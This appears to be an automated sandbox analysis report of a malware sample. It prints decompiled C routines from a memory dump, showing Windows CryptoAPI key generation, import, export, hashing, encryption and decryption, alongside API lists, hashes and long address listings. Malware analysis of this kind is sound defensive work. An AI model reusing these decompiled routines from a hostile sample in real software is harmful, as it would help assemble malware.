                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 022ad6735274eca1bacb20ca1096ec9c2ffba615014bbf335e885f49c5a60a12
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F151F271A50318ABDB26DF54CC95FEE777CAB48B00F0085D8F609AA181DB799B84CF64
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 769 7b8800-7b8811 770 7b895c-7b8962 769->770 771 7b8817-7b881b 769->771 771->770 772 7b8821-7b8843 CryptAcquireContextA 771->772 773 7b887a-7b887e 772->773 774 7b8845-7b8855 GetLastError 772->774 773->770 777 7b8884-7b88b7 CryptGenKey 773->777 775 7b8860-7b8874 CryptAcquireContextA 774->775 776 7b8857-7b885e 774->776 775->773 776->773 776->775 778 7b88bd-7b88d7 CryptExportKey 777->778 779 7b8950-7b8956 CryptReleaseContext 777->779 780 7b88d9-7b88dd 778->780 781 7b8946-7b894a CryptDestroyKey 778->781 779->770 782 7b893f 780->782 783 7b88df-7b88e3 780->783 781->779 782->781 783->782 784 7b88e5-7b88e9 783->784 784->782 785 7b88eb-7b88ef 784->785 785->782 786 7b88f1-7b8914 CryptImportKey 785->786 787 7b893d 786->787 788 7b8916-7b8937 CryptExportKey CryptDestroyKey 786->788 787->781 788->787
                                                                                                                                                                                                                                                                            C-Code - Quality: 62%
                                                                                                                                                                                                                                                                            			E007B8800(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, BYTE* _a20, int _a24) {
                                                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                                                            				long* _v12;
                                                                                                                                                                                                                                                                            				long _v16;
                                                                                                                                                                                                                                                                            				long* _v20;
                                                                                                                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                                                                                                                            				long* _v32;
                                                                                                                                                                                                                                                                            				char* _t41;
                                                                                                                                                                                                                                                                            				int _t42;
                                                                                                                                                                                                                                                                            				signed int _t43;
                                                                                                                                                                                                                                                                            				intOrPtr _t46;
                                                                                                                                                                                                                                                                            				int _t49;
                                                                                                                                                                                                                                                                            				int _t51;
                                                                                                                                                                                                                                                                            				char* _t71;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                            					L19:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v12 = 0;
                                                                                                                                                                                                                                                                            					_t41 =  *0x7c3370; // 0x7bc6e4
                                                                                                                                                                                                                                                                            					_t42 = CryptAcquireContextA( &_v12, _t41, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                            					if(_t42 == 0) {
                                                                                                                                                                                                                                                                            						_v16 = GetLastError();
                                                                                                                                                                                                                                                                            						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                            							_t71 =  *0x7c3370; // 0x7bc6e4
                                                                                                                                                                                                                                                                            							CryptAcquireContextA( &_v12, _t71, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                                                                                                                            						_v28 = 0x80;
                                                                                                                                                                                                                                                                            						_v20 = 0;
                                                                                                                                                                                                                                                                            						_v24 = _v28 << 0x00000010 | 0x00000001;
                                                                                                                                                                                                                                                                            						_t43 = _v24;
                                                                                                                                                                                                                                                                            						__imp__CryptGenKey(_v12, 0x6801, _t43,  &_v20);
                                                                                                                                                                                                                                                                            						if(_t43 != 0) {
                                                                                                                                                                                                                                                                            							_t46 = _a4;
                                                                                                                                                                                                                                                                            							__imp__CryptExportKey(_v20, 0, 8, 0, _t46, _a8);
                                                                                                                                                                                                                                                                            							if(_t46 != 0) {
                                                                                                                                                                                                                                                                            								if(_a12 == 0 || _a16 == 0 || _a20 == 0 || _a24 == 0) {
                                                                                                                                                                                                                                                                            									_v8 = 1;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_v32 = 0;
                                                                                                                                                                                                                                                                            									_t49 = CryptImportKey(_v12, _a20, _a24, 0, 1,  &_v32); // executed
                                                                                                                                                                                                                                                                            									if(_t49 != 0) {
                                                                                                                                                                                                                                                                            										_t51 = _v20;
                                                                                                                                                                                                                                                                            										__imp__CryptExportKey(_t51, _v32, 1, 0, _a12, _a16); // executed
                                                                                                                                                                                                                                                                            										_v8 = _t51;
                                                                                                                                                                                                                                                                            										CryptDestroyKey(_v32);
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							CryptDestroyKey(_v20);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L19;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                                                            0x007b8806
                                                                                                                                                                                                                                                                            0x007b8811
                                                                                                                                                                                                                                                                            0x007b895c
                                                                                                                                                                                                                                                                            0x007b8962
                                                                                                                                                                                                                                                                            0x007b8821
                                                                                                                                                                                                                                                                            0x007b8821
                                                                                                                                                                                                                                                                            0x007b8831
                                                                                                                                                                                                                                                                            0x007b883b
                                                                                                                                                                                                                                                                            0x007b8843
                                                                                                                                                                                                                                                                            0x007b884b
                                                                                                                                                                                                                                                                            0x007b8855
                                                                                                                                                                                                                                                                            0x007b8869
                                                                                                                                                                                                                                                                            0x007b8874
                                                                                                                                                                                                                                                                            0x007b8874
                                                                                                                                                                                                                                                                            0x007b8855
                                                                                                                                                                                                                                                                            0x007b887e
                                                                                                                                                                                                                                                                            0x007b8884
                                                                                                                                                                                                                                                                            0x007b888b
                                                                                                                                                                                                                                                                            0x007b889b
                                                                                                                                                                                                                                                                            0x007b88a2
                                                                                                                                                                                                                                                                            0x007b88af
                                                                                                                                                                                                                                                                            0x007b88b7
                                                                                                                                                                                                                                                                            0x007b88c1
                                                                                                                                                                                                                                                                            0x007b88cf
                                                                                                                                                                                                                                                                            0x007b88d7
                                                                                                                                                                                                                                                                            0x007b88dd
                                                                                                                                                                                                                                                                            0x007b893f
                                                                                                                                                                                                                                                                            0x007b88f1
                                                                                                                                                                                                                                                                            0x007b88f1
                                                                                                                                                                                                                                                                            0x007b890c
                                                                                                                                                                                                                                                                            0x007b8914
                                                                                                                                                                                                                                                                            0x007b8926
                                                                                                                                                                                                                                                                            0x007b892a
                                                                                                                                                                                                                                                                            0x007b8930
                                                                                                                                                                                                                                                                            0x007b8937
                                                                                                                                                                                                                                                                            0x007b8937
                                                                                                                                                                                                                                                                            0x007b893d
                                                                                                                                                                                                                                                                            0x007b88dd
                                                                                                                                                                                                                                                                            0x007b894a
                                                                                                                                                                                                                                                                            0x007b894a
                                                                                                                                                                                                                                                                            0x007b8956
                                                                                                                                                                                                                                                                            0x007b8956
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b887e

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CryptAcquireContextA.ADVAPI32(00000000,007BC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,007B8420,00000000,00001000,00000000), ref: 007B883B
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 007B8845
                                                                                                                                                                                                                                                                            • CryptAcquireContextA.ADVAPI32(00000000,007BC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 007B8874
                                                                                                                                                                                                                                                                            • CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 007B88AF
                                                                                                                                                                                                                                                                            • CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 007B88CF
                                                                                                                                                                                                                                                                            • CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 007B890C
                                                                                                                                                                                                                                                                            • CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 007B892A
                                                                                                                                                                                                                                                                            • CryptDestroyKey.ADVAPI32(?), ref: 007B8937
                                                                                                                                                                                                                                                                            • CryptDestroyKey.ADVAPI32(00000000), ref: 007B894A
                                                                                                                                                                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 007B8956
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 007B882C
                                                                                                                                                                                                                                                                            • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 007B8864
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Crypt$Context$AcquireDestroyExport$ErrorImportLastRelease
                                                                                                                                                                                                                                                                            • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                            • API String ID: 3052018297-947817771
                                                                                                                                                                                                                                                                            • Opcode ID: ea24b3da40ba0e9af29461b358f573f5a241f6d9a7faf86145c54ed008317864
                                                                                                                                                                                                                                                                            • Instruction ID: 7a44004c727526fd2d3a56efc3ca00bf42d7e9fc331b7aa53f070ab7d86126ff
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea24b3da40ba0e9af29461b358f573f5a241f6d9a7faf86145c54ed008317864
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76410971A00209EBEF55DF94CC49FEE77B8BB48705F14C508F611AA190CBB9A944CBA6
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 30%
                                                                                                                                                                                                                                                                            			E007B8BB0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                                                            				long* _v12;
                                                                                                                                                                                                                                                                            				int _v16;
                                                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                                                            				int _v24;
                                                                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                                                                            				int _v32;
                                                                                                                                                                                                                                                                            				char* _t36;
                                                                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                                                                            				intOrPtr _t39;
                                                                                                                                                                                                                                                                            				char* _t41;
                                                                                                                                                                                                                                                                            				intOrPtr _t43;
                                                                                                                                                                                                                                                                            				char* _t57;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                            					L17:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v12 = 0;
                                                                                                                                                                                                                                                                            					_t36 =  *0x7c3370; // 0x7bc6e4
                                                                                                                                                                                                                                                                            					_t37 = CryptAcquireContextA( &_v12, _t36, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                            					if(_t37 == 0) {
                                                                                                                                                                                                                                                                            						_t37 = GetLastError();
                                                                                                                                                                                                                                                                            						_v16 = _t37;
                                                                                                                                                                                                                                                                            						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                            							_t57 =  *0x7c3370; // 0x7bc6e4
                                                                                                                                                                                                                                                                            							_t37 = CryptAcquireContextA( &_v12, _t57, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                                                                                                                            						__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v20);
                                                                                                                                                                                                                                                                            						if(_t37 != 0) {
                                                                                                                                                                                                                                                                            							_t39 = _a8;
                                                                                                                                                                                                                                                                            							__imp__CryptHashData(_v20, _a4, _t39, 0);
                                                                                                                                                                                                                                                                            							if(_t39 != 0) {
                                                                                                                                                                                                                                                                            								_v24 = 0;
                                                                                                                                                                                                                                                                            								_v28 = 4;
                                                                                                                                                                                                                                                                            								_t41 =  &_v28;
                                                                                                                                                                                                                                                                            								__imp__CryptGetHashParam(_v20, 4,  &_v24, _t41, 0);
                                                                                                                                                                                                                                                                            								if(_t41 != 0 && _a16 >= _v24) {
                                                                                                                                                                                                                                                                            									_v32 = _a16;
                                                                                                                                                                                                                                                                            									_t43 = _a12;
                                                                                                                                                                                                                                                                            									__imp__CryptGetHashParam(_v20, 2, _t43,  &_v32, 0);
                                                                                                                                                                                                                                                                            									if(_t43 != 0) {
                                                                                                                                                                                                                                                                            										_v8 = _v32;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							__imp__CryptDestroyHash(_v20);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L17;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                                                                            0x007b8bb6
                                                                                                                                                                                                                                                                            0x007b8bc1
                                                                                                                                                                                                                                                                            0x007b8ce7
                                                                                                                                                                                                                                                                            0x007b8ced
                                                                                                                                                                                                                                                                            0x007b8be5
                                                                                                                                                                                                                                                                            0x007b8be5
                                                                                                                                                                                                                                                                            0x007b8bf5
                                                                                                                                                                                                                                                                            0x007b8bff
                                                                                                                                                                                                                                                                            0x007b8c07
                                                                                                                                                                                                                                                                            0x007b8c09
                                                                                                                                                                                                                                                                            0x007b8c0f
                                                                                                                                                                                                                                                                            0x007b8c19
                                                                                                                                                                                                                                                                            0x007b8c2d
                                                                                                                                                                                                                                                                            0x007b8c38
                                                                                                                                                                                                                                                                            0x007b8c38
                                                                                                                                                                                                                                                                            0x007b8c19
                                                                                                                                                                                                                                                                            0x007b8c42
                                                                                                                                                                                                                                                                            0x007b8c59
                                                                                                                                                                                                                                                                            0x007b8c61
                                                                                                                                                                                                                                                                            0x007b8c65
                                                                                                                                                                                                                                                                            0x007b8c71
                                                                                                                                                                                                                                                                            0x007b8c79
                                                                                                                                                                                                                                                                            0x007b8c7b
                                                                                                                                                                                                                                                                            0x007b8c82
                                                                                                                                                                                                                                                                            0x007b8c8b
                                                                                                                                                                                                                                                                            0x007b8c99
                                                                                                                                                                                                                                                                            0x007b8ca1
                                                                                                                                                                                                                                                                            0x007b8cae
                                                                                                                                                                                                                                                                            0x007b8cb7
                                                                                                                                                                                                                                                                            0x007b8cc1
                                                                                                                                                                                                                                                                            0x007b8cc9
                                                                                                                                                                                                                                                                            0x007b8cce
                                                                                                                                                                                                                                                                            0x007b8cce
                                                                                                                                                                                                                                                                            0x007b8cc9
                                                                                                                                                                                                                                                                            0x007b8ca1
                                                                                                                                                                                                                                                                            0x007b8cd5
                                                                                                                                                                                                                                                                            0x007b8cd5
                                                                                                                                                                                                                                                                            0x007b8ce1
                                                                                                                                                                                                                                                                            0x007b8ce1
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b8c42

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CryptAcquireContextA.ADVAPI32(00000000,007BC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 007B8BFF
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 007B8C09
                                                                                                                                                                                                                                                                            • CryptAcquireContextA.ADVAPI32(00000000,007BC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 007B8C38
                                                                                                                                                                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 007B8C59
                                                                                                                                                                                                                                                                            • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 007B8C71
                                                                                                                                                                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 007B8C99
                                                                                                                                                                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 007B8CC1
                                                                                                                                                                                                                                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 007B8CD5
                                                                                                                                                                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 007B8CE1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 007B8C28
                                                                                                                                                                                                                                                                            • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 007B8BF0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastRelease
                                                                                                                                                                                                                                                                            • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                            • API String ID: 731959895-947817771
                                                                                                                                                                                                                                                                            • Opcode ID: 7df843a3599fa34ecb65b716efc29f340b89b2541f132437a0a0462b5fd3bd9a
                                                                                                                                                                                                                                                                            • Instruction ID: d9d16c6f1c24d7b3e7eddeccba4654c1286a0f9621cbb8b7a52bf978f0cf03ea
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7df843a3599fa34ecb65b716efc29f340b89b2541f132437a0a0462b5fd3bd9a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 654119B1A40209EBDB14DF94CD89FEF7BB8BB44701F14C549F601AA180DBB8AA44CB75
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007B8A70(BYTE* _a4, DWORD* _a8, BYTE* _a12, int _a16, BYTE* _a20, int _a24) {
                                                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                                                            				long* _v12;
                                                                                                                                                                                                                                                                            				long _v16;
                                                                                                                                                                                                                                                                            				long* _v20;
                                                                                                                                                                                                                                                                            				long* _v24;
                                                                                                                                                                                                                                                                            				char* _t35;
                                                                                                                                                                                                                                                                            				int _t36;
                                                                                                                                                                                                                                                                            				int _t38;
                                                                                                                                                                                                                                                                            				char* _t62;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0 || _a20 == 0 || _a24 == 0) {
                                                                                                                                                                                                                                                                            					L16:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v12 = 0;
                                                                                                                                                                                                                                                                            					_t35 =  *0x7c3370; // 0x7bc6e4
                                                                                                                                                                                                                                                                            					_t36 = CryptAcquireContextA( &_v12, _t35, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                            					if(_t36 == 0) {
                                                                                                                                                                                                                                                                            						_v16 = GetLastError();
                                                                                                                                                                                                                                                                            						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                            							_t62 =  *0x7c3370; // 0x7bc6e4
                                                                                                                                                                                                                                                                            							CryptAcquireContextA( &_v12, _t62, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                                                                                                                            						_v20 = 0;
                                                                                                                                                                                                                                                                            						_t38 = CryptImportKey(_v12, _a20, _a24, 0, 1,  &_v20); // executed
                                                                                                                                                                                                                                                                            						if(_t38 != 0) {
                                                                                                                                                                                                                                                                            							_v24 = 0;
                                                                                                                                                                                                                                                                            							if(CryptImportKey(_v12, _a12, _a16, _v20, 1,  &_v24) != 0) {
                                                                                                                                                                                                                                                                            								_v8 = CryptDecrypt(_v24, 0, 1, 0, _a4, _a8);
                                                                                                                                                                                                                                                                            								CryptDestroyKey(_v24);
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							CryptDestroyKey(_v20);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L16;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                                                            0x007b8a76
                                                                                                                                                                                                                                                                            0x007b8a81
                                                                                                                                                                                                                                                                            0x007b8ba3
                                                                                                                                                                                                                                                                            0x007b8ba9
                                                                                                                                                                                                                                                                            0x007b8ab9
                                                                                                                                                                                                                                                                            0x007b8ab9
                                                                                                                                                                                                                                                                            0x007b8ac9
                                                                                                                                                                                                                                                                            0x007b8ad3
                                                                                                                                                                                                                                                                            0x007b8adb
                                                                                                                                                                                                                                                                            0x007b8ae3
                                                                                                                                                                                                                                                                            0x007b8aed
                                                                                                                                                                                                                                                                            0x007b8b01
                                                                                                                                                                                                                                                                            0x007b8b0c
                                                                                                                                                                                                                                                                            0x007b8b0c
                                                                                                                                                                                                                                                                            0x007b8aed
                                                                                                                                                                                                                                                                            0x007b8b16
                                                                                                                                                                                                                                                                            0x007b8b1c
                                                                                                                                                                                                                                                                            0x007b8b37
                                                                                                                                                                                                                                                                            0x007b8b3f
                                                                                                                                                                                                                                                                            0x007b8b41
                                                                                                                                                                                                                                                                            0x007b8b66
                                                                                                                                                                                                                                                                            0x007b8b80
                                                                                                                                                                                                                                                                            0x007b8b87
                                                                                                                                                                                                                                                                            0x007b8b87
                                                                                                                                                                                                                                                                            0x007b8b91
                                                                                                                                                                                                                                                                            0x007b8b91
                                                                                                                                                                                                                                                                            0x007b8b9d
                                                                                                                                                                                                                                                                            0x007b8b9d
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b8b16

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CryptAcquireContextA.ADVAPI32(00000000,007BC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 007B8AD3
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 007B8ADD
                                                                                                                                                                                                                                                                            • CryptAcquireContextA.ADVAPI32(00000000,007BC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 007B8B0C
                                                                                                                                                                                                                                                                            • CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 007B8B37
                                                                                                                                                                                                                                                                            • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 007B8B5E
                                                                                                                                                                                                                                                                            • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 007B8B7A
                                                                                                                                                                                                                                                                            • CryptDestroyKey.ADVAPI32(00000000), ref: 007B8B87
                                                                                                                                                                                                                                                                            • CryptDestroyKey.ADVAPI32(00000000), ref: 007B8B91
                                                                                                                                                                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 007B8B9D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 007B8AFC
                                                                                                                                                                                                                                                                            • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 007B8AC4
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Crypt$Context$AcquireDestroyImport$DecryptErrorLastRelease
                                                                                                                                                                                                                                                                            • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                            • API String ID: 1555285084-947817771
                                                                                                                                                                                                                                                                            • Opcode ID: aba2dc0f0760efcfedc3ff34325bdfddad2ca4edb7bdd4a7a21dab8a63acdfc0
                                                                                                                                                                                                                                                                            • Instruction ID: 411b55b0de20de2beae12c958b3526c978b3bbb9b6c4e28b82e6eb1562c7e16d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aba2dc0f0760efcfedc3ff34325bdfddad2ca4edb7bdd4a7a21dab8a63acdfc0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D31F9B1A00209EBDB15DFA4CC49FEF77B9BB48705F14C558F601AA190CBB89A40CBA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                                                            			E007B8970(intOrPtr _a4, intOrPtr* _a8, BYTE* _a12, int _a16) {
                                                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                                                            				long* _v12;
                                                                                                                                                                                                                                                                            				long _v16;
                                                                                                                                                                                                                                                                            				long* _v20;
                                                                                                                                                                                                                                                                            				char* _t27;
                                                                                                                                                                                                                                                                            				int _t28;
                                                                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                                                                            				char* _t47;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v12 = 0;
                                                                                                                                                                                                                                                                            					_t27 =  *0x7c3370; // 0x7bc6e4
                                                                                                                                                                                                                                                                            					_t28 = CryptAcquireContextA( &_v12, _t27, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                            					if(_t28 == 0) {
                                                                                                                                                                                                                                                                            						_v16 = GetLastError();
                                                                                                                                                                                                                                                                            						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                            							_t47 =  *0x7c3370; // 0x7bc6e4
                                                                                                                                                                                                                                                                            							CryptAcquireContextA( &_v12, _t47, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                                                                                                                            						_v20 = 0;
                                                                                                                                                                                                                                                                            						if(CryptImportKey(_v12, _a12, _a16, 0, 1,  &_v20) != 0) {
                                                                                                                                                                                                                                                                            							_t33 = _v20;
                                                                                                                                                                                                                                                                            							__imp__CryptEncrypt(_t33, 0, 1, 0, _a4, _a8,  *_a8);
                                                                                                                                                                                                                                                                            							_v8 = _t33;
                                                                                                                                                                                                                                                                            							CryptDestroyKey(_v20);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                                                            0x007b8976
                                                                                                                                                                                                                                                                            0x007b8981
                                                                                                                                                                                                                                                                            0x007b8a60
                                                                                                                                                                                                                                                                            0x007b8a66
                                                                                                                                                                                                                                                                            0x007b89a5
                                                                                                                                                                                                                                                                            0x007b89a5
                                                                                                                                                                                                                                                                            0x007b89b5
                                                                                                                                                                                                                                                                            0x007b89bf
                                                                                                                                                                                                                                                                            0x007b89c7
                                                                                                                                                                                                                                                                            0x007b89cf
                                                                                                                                                                                                                                                                            0x007b89d9
                                                                                                                                                                                                                                                                            0x007b89ed
                                                                                                                                                                                                                                                                            0x007b89f8
                                                                                                                                                                                                                                                                            0x007b89f8
